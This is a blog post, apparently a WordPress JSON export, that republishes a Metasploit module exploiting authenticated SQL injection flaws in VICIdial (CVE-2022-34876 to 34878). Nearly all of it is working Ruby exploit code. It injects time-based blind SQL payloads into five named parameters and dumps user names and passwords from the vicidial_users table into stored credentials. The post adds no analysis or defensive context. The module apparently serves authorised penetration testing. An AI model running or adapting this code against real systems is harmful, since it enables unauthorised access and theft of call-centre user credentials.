{"id":59380,"date":"2024-09-01T22:40:08","date_gmt":"2024-09-01T19:40:08","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181209\/vicidial_multiple_sqli.rb.txt"},"modified":"2024-09-01T22:40:08","modified_gmt":"2024-09-01T19:40:08","slug":"vicidial-multiple-authenticated-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/vicidial-multiple-authenticated-sql-injection\/","title":{"rendered":"VICIdial Multiple Authenticated SQL Injection"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Exploit::SQLi<\/p>\n

def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘VICIdial Multiple Authenticated SQLi’,
‘Description’ => %q{
This module exploits several authenticated SQL Inject vulnerabilities in VICIdial 2.14b0.5 prior to
svn\/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable).
Injection point 1 is on vicidial\/admin.php when adding a user, in the modify_email_accounts parameter.
Injection point 2 is on vicidial\/admin.php when adding a user, in the access_recordings parameter.
Injection point 3 is on vicidial\/admin.php when adding a user, in the agentcall_email parameter.
Injection point 4 is on vicidial\/AST_agent_time_sheet.php when adding a user, in the agent parameter.
Injection point 5 is on vicidial\/user_stats.php when adding a user, in the file_download parameter.
VICIdial does not encrypt passwords by default.
},
‘Author’ => [
‘h00die’ # msf module, discovery
],
‘License’ => MSF_LICENSE,
‘References’ => [
[ ‘URL’, ‘https:\/\/www.vicidial.org\/VICIDIALforum\/viewtopic.php?f=4&t=41300&sid=aacb27a29fefd85265b4d55fe51122af’],
[ ‘CVE’, ‘2022-34876’], # admin.php
[ ‘CVE’, ‘2022-34877’], # AST_agent_time_sheet.php
[ ‘CVE’, ‘2022-34878’] # user_stats.php
],
‘Actions’ => [
[‘List Users – modify_email_accounts method’, { ‘Description’ => ‘Queries username, password for COUNT users’ }],
[‘List Users – access_recordings method’, { ‘Description’ => ‘Queries username, password for COUNT users’ }],
[‘List Users – agentcall_email method’, { ‘Description’ => ‘Queries username, password for COUNT users’ }],
[‘List Users – agent_time_sheet method’, { ‘Description’ => ‘Queries username, password for COUNT users’ }],
[‘List Users – user_stats method’, { ‘Description’ => ‘Queries username, password for COUNT users’ }],
],
‘DefaultAction’ => ‘List Users’,
‘DisclosureDate’ => ‘2022-04-19’,
‘Notes’ => {
‘Stability’ => [CRASH_SAFE],
‘SideEffects’ => [IOC_IN_LOGS],
‘Reliability’ => []}
)
)
register_options [
OptInt.new(‘COUNT’, [false, ‘Number of users to enumerate’, 3]),
OptString.new(‘USERNAME’, [true, ‘Valid Username for login’, ‘6666’]),
OptString.new(‘PASSWORD’, [true, ‘Valid Password for login’, ”]),
OptString.new(‘ACTION’, [true, ‘Valid Password for login’, ‘List Users – access_recordings method’])
]end<\/p>\n

def post_4a
{
‘ADD’ => ‘4A’,
‘custom_fields_modify’ => ‘0’,
‘user’ => ‘111’,
‘pass’ => ‘111’,
‘force_change_password’ => ‘N’,
‘full_name’ => ‘111’,
‘user_level’ => ‘1’,
‘user_group’ => ‘ADMIN’,
‘phone_login’ => ‘111’,
‘phone_pass’ => ‘111’,
‘active’ => ‘Y’,
‘voicemail_id’ => ”,
’email’ => ”,
‘mobile_number’ => ”,
‘user_code’ => ”,
‘user_location’ => ”,
‘territory’ => ”,
‘user_nickname’ => ”,
‘user_new_lead_limit’ => ‘-1’,
‘agent_choose_ingroups’ => ‘1’,
‘agent_choose_blended’ => ‘1’,
‘hotkeys_active’ => ‘0’,
‘scheduled_callbacks’ => ‘1’,
‘agentonly_callbacks’ => ‘0’,
‘next_dial_my_callbacks’ => ‘NOT_ACTIVE’,
‘agentcall_manual’ => ‘0’,
‘manual_dial_filter’ => ‘DISABLED’,
‘agentcall_email’ => ‘0’,
‘agentcall_chat’ => ‘0’,
‘vicidial_recording’ => ‘1’,
‘vicidial_transfers’ => ‘1’,
‘closer_default_blended’ => ‘0’,
‘user_choose_language’ => ‘0’,
‘selected_language’ => ‘defaultEnglish’,
‘vicidial_recording_override’ => ‘DISABLED’,
‘mute_recordings’ => ‘DISABLED’,
‘alter_custdata_override’ => ‘NOT_ACTIVE’,
‘alter_custphone_override’ => ‘NOT_ACTIVE’,
‘agent_shift_enforcement_override’ => ‘DISABLED’,
‘agent_call_log_view_override’ => ‘DISABLED’,
‘hide_call_log_info’ => ‘DISABLED’,
‘agent_lead_search’ => ‘NOT_ACTIVE’,
‘lead_filter_id’ => ‘NONE’,
‘user_hide_realtime’ => ‘0’,
‘allow_alerts’ => ‘0’,
‘preset_contact_search’ => ‘NOT_ACTIVE’,
‘max_inbound_calls’ => ‘0’,
‘max_inbound_filter_enabled’ => ‘0’,
‘max_inbound_filter_min_sec’ => ‘-1’,
‘max_hopper_calls’ => ‘0’,
‘max_hopper_calls_hour’ => ‘0’,
‘wrapup_seconds_override’ => ‘-1’,
‘ready_max_logout’ => ‘-1’,
‘status_group_id’ => ”,
‘custom_one’ => ”,
‘custom_two’ => ”,
‘custom_three’ => ”,
‘custom_four’ => ”,
‘custom_five’ => ”,
‘qc_enabled’ => ‘0’,
‘qc_user_level’ => ‘1’,
‘qc_pass’ => ‘0’,
‘qc_finish’ => ‘0’,
‘qc_commit’ => ‘0’,
‘realtime_block_user_info’ => ‘0’,
‘admin_hide_lead_data’ => ‘0’,
‘admin_hide_phone_data’ => ‘0’,
‘ignore_group_on_search’ => ‘0’,
‘user_admin_redirect_url’ => ”,
‘view_reports’ => ‘0’,
‘access_recordings’ => ‘0’,
‘alter_agent_interface_options’ => ‘0’,
‘modify_users’ => ‘0’,
‘change_agent_campaign’ => ‘0’,
‘delete_users’ => ‘0’,
‘modify_usergroups’ => ‘0’,
‘delete_user_groups’ => ‘0’,
‘modify_lists’ => ‘0’,
‘delete_lists’ => ‘0’,
‘load_leads’ => ‘0’,
‘modify_leads’ => ‘0’,
‘export_gdpr_leads’ => ‘0’,
‘download_lists’ => ‘0’,
‘export_reports’ => ‘0’,
‘delete_from_dnc’ => ‘0’,
‘modify_campaigns’ => ‘0’,
‘campaign_detail’ => ‘0’,
‘delete_campaigns’ => ‘0’,
‘modify_ingroups’ => ‘0’,
‘delete_ingroups’ => ‘0’,
‘modify_inbound_dids’ => ‘0’,
‘delete_inbound_dids’ => ‘0’,
‘modify_custom_dialplans’ => ‘0’,
‘modify_remoteagents’ => ‘0’,
‘delete_remote_agents’ => ‘0’,
‘modify_scripts’ => ‘0’,
‘delete_scripts’ => ‘0’,
‘modify_filters’ => ‘0’,
‘delete_filters’ => ‘0’,
‘ast_admin_access’ => ‘0’,
‘ast_delete_phones’ => ‘0’,
‘modify_call_times’ => ‘0’,
‘delete_call_times’ => ‘0’,
‘modify_servers’ => ‘0’,
‘modify_shifts’ => ‘0’,
‘modify_phones’ => ‘0’,
‘modify_carriers’ => ‘0’,
‘modify_email_accounts’ => ‘0’,
‘vKik’ => ‘vKik’,
‘modify_labels’ => ‘0’,
‘modify_colors’ => ‘0’,
‘modify_languages’ => ‘0’,
‘modify_statuses’ => ‘0’,
‘modify_voicemail’ => ‘0’,
‘modify_audiostore’ => ‘0’,
‘modify_moh’ => ‘0’,
‘modify_tts’ => ‘0’,
‘modify_contacts’ => ‘0’,
‘callcard_admin’ => ‘0’,
‘modify_auto_reports’ => ‘0’,
‘add_timeclock_log’ => ‘0’,
‘modify_timeclock_log’ => ‘0’,
‘delete_timeclock_log’ => ‘0’,
‘manager_shift_enforcement_override’ => ‘0’,
‘pause_code_approval’ => ‘0’,
‘admin_cf_show_hidden’ => ‘0’,
‘modify_ip_lists’ => ‘0’,
‘ignore_ip_list’ => ‘0’,
‘two_factor_override’ => ‘NOT_ACTIVE’,
‘vdc_agent_api_access’ => ‘0’,
‘api_list_restrict’ => ‘0’,
‘api_allowed_functions[]’ => ‘ALL_FUNCTIONS’,
‘api_only_user’ => ‘0’,
‘modify_same_user_level’ => ‘1’,
‘alter_admin_interface_options’ => ‘1’,
‘SUBMIT’ => ‘SUBMIT’
}
end<\/p>\n

def basic_auth
user_pass = “#{datastore[‘USERNAME’]}:#{datastore[‘PASSWORD’]}”
{
‘Authorization’ => “Basic #{Rex::Text.encode_base64(user_pass)}”
}
end<\/p>\n

def inject_admin_page(param, payload)
data = post_4a
d = Rex::Text.rand_text_numeric(4)
data[param] = “0′ AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND ‘#{d}’=’#{d}”
res = send_request_cgi({
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path, ‘vicidial’, ‘admin.php’),
‘headers’ => basic_auth,
‘vars_post’ => data
})<\/p>\n

fail_with Failure::Unreachable, ‘Connection failed’ unless res
end<\/p>\n

def run_host(ip)
res = send_request_cgi({
‘method’ => ‘GET’,
‘uri’ => normalize_uri(target_uri.path, ‘vicidial’, ‘admin.php’),
‘headers’ => basic_auth
})<\/p>\n

fail_with(Failure::Unreachable, ‘Failed to load website’) unless res
fail_with(Failure::NoAccess, ‘Invalid login\/password’) if res.code == 401
@sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload|
d = Rex::Text.rand_text_numeric(4)
if datastore[‘ACTION’] == ‘List Users – modify_email_accounts method’
inject_admin_page(‘modify_email_accounts’, payload)
elsif datastore[‘ACTION’] == ‘List Users – access_recordings method’
inject_admin_page(‘access_recordings’, payload)
elsif datastore[‘ACTION’] == ‘List Users – agentcall_email method’
inject_admin_page(‘agentcall_email’, payload)
elsif datastore[‘ACTION’] == ‘List Users – agent_time_sheet method’
res = send_request_cgi({
‘method’ => ‘GET’,
‘uri’ => normalize_uri(target_uri.path, ‘vicidial’, ‘AST_agent_time_sheet.php’),
‘headers’ => basic_auth,
‘vars_get’ => {
‘agent’ => “0′ AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND ‘#{d}’=’#{d}”
}
})
elsif datastore[‘ACTION’] == ‘List Users – user_stats method’
res = send_request_cgi({
‘method’ => ‘GET’,
‘uri’ => normalize_uri(target_uri.path, ‘vicidial’, ‘user_stats.php’),
‘headers’ => basic_auth,
‘vars_get’ => {
‘DB’ => ”,
‘pause_code_rpt’ => ”,
‘park_rpt’ => ‘1’,
‘did_id’ => ”,
‘did’ => ”,
‘begin_date’ => Date.today.to_s,
‘end_date’ => Date.today.to_s,
‘user’ => ”,
‘submit’ => ‘submit’,
‘search_archived_data’ => ”,
‘NVAuser’ => ”,
‘file_download’ => “1′ AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND ‘#{d}’=’#{d}”
}
})
end
end<\/p>\n

unless @sqli.test_vulnerable
print_bad(“#{peer} – Testing of SQLi failed. If this is time based, try increasing SqliDelay.”)
return
end
columns = [‘user’, ‘pass’]\n

print_status(‘Enumerating Usernames and Password Hashes’)
data = @sqli.dump_table_fields(‘vicidial_users’, columns, ”, datastore[‘COUNT’])<\/p>\n

table = Rex::Text::Table.new(‘Header’ => ‘vicidial_users’, ‘Indent’ => 1, ‘Columns’ => columns)
data.each do |user|
create_credential({
workspace_id: myworkspace_id,
origin_type: :service,
module_fullname: fullname,
username: user[0],
private_type: :password,
private_data: user[1],
service_name: ‘VICIdial’,
address: ip,
port: datastore[‘RPORT’],
protocol: ‘tcp’,
status: Metasploit::Model::Login::Status::UNTRIED
})
table << user
end
print_good(‘Dumped table contents:’)
print_line(table.to_s)
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::Scannerinclude Msf::Exploit::SQLi def initialize(info = {})super(update_info(info,‘Name’ => ‘VICIdial Multiple Authenticated SQLi’,‘Description’ => %q{This module exploits several authenticated SQL Inject vulnerabilities in VICIdial 2.14b0.5 prior tosvn\/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable).Injection point 1 is on vicidial\/admin.php when …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59380","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59380","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59380"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59380\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59380"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59380"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59380"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}